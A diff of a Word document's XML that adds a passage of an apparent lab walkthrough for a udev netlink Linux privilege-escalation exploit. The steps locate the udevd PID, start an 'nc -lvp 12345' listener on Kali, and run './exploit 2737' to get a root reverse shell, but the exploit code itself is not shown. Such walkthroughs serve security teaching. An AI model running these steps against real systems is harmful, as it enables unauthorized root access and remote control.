+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>cat /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>proc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>/net/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>netlink</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTML"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>ps</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> aux | </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>grep</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>udev</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTML"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTML"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">The only nonzero PID in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t>netlink</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> should be the number you want. When I did it, it was </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t>273</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t>7</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t>, as shown below.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t>For confirmation, the PID of the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t>udevd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t> process should be one higher. It was 273</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> when I did it, as shown below.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74E38D35" wp14:editId="58AD11CE">
+            <wp:extent cx="5943600" cy="2175510"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="6" name="图片 6"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2175510"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>Starting a Listener</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t xml:space="preserve">When the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t>udev</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> exploit runs, it will execute the "run" script, which will connect back to Kali on port 12345.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t>On Kali, open a new Terminal window and execute these command to listen for connections.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTML"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>lvp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 12345</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>Running the Exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t>On Kali, in your low-privilege shell, execute this command to escalate privileges and open a reverse shell. Replace the number with the correct PID for your target.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTML"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>./</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>exploit 273</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>7</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">The only nonzero PID in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t>netlink</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> should be the number you want. When I did it, it was </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t>273</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t>7</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t>, as shown below.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t>For confirmation, the PID of the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t>udevd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t> process s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t>hould be one higher. It was 273</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> when I did it, as shown below.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t>And</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> now, we can have the root .</w:t>
+      </w:r>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
-          <w:color w:val="858585"/>
-          <w:spacing w:val="3"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15A70A61" wp14:editId="4445DB6B">
+            <wp:extent cx="5943600" cy="2281555"/>
+            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
+            <wp:docPr id="4" name="图片 4"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2281555"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
@@ -2492,7 +4613,7 @@
         <w:kern w:val="2"/>
         <w:sz w:val="24"/>
         <w:szCs w:val="24"/>
-        <w:lang w:eastAsia="zh-CN" w:bidi="ar-SA"/>
+        <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
         <w14:ligatures w14:val="standardContextual"/>
       </w:rPr>
     </w:rPrDefault>
@@ -2919,6 +5040,28 @@
       <w:szCs w:val="32"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="3">
+    <w:name w:val="heading 3"/>
+    <w:basedOn w:val="a"/>
+    <w:next w:val="a"/>
+    <w:link w:val="30"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="004A41A4"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="260" w:after="260" w:line="416" w:lineRule="auto"/>
+      <w:outlineLvl w:val="2"/>
+    </w:pPr>
+    <w:rPr>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="32"/>
+      <w:szCs w:val="32"/>
+    </w:rPr>
+  </w:style>
   <w:style w:type="character" w:default="1" w:styleId="a0">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
@@ -2969,7 +5112,6 @@
     <w:basedOn w:val="a"/>
     <w:link w:val="HTML0"/>
     <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:rsid w:val="0085759E"/>
     <w:pPr>
@@ -3005,7 +5147,6 @@
     <w:basedOn w:val="a0"/>
     <w:link w:val="HTML"/>
     <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
     <w:rsid w:val="0085759E"/>
     <w:rPr>
       <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -3149,6 +5290,19 @@
     <w:rsid w:val="00E468C1"/>
     <w:rPr>
       <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="32"/>
+      <w:szCs w:val="32"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="30">
+    <w:name w:val="标题 3 字符"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="3"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="004A41A4"/>
+    <w:rPr>
       <w:b/>
       <w:bCs/>
       <w:sz w:val="32"/>
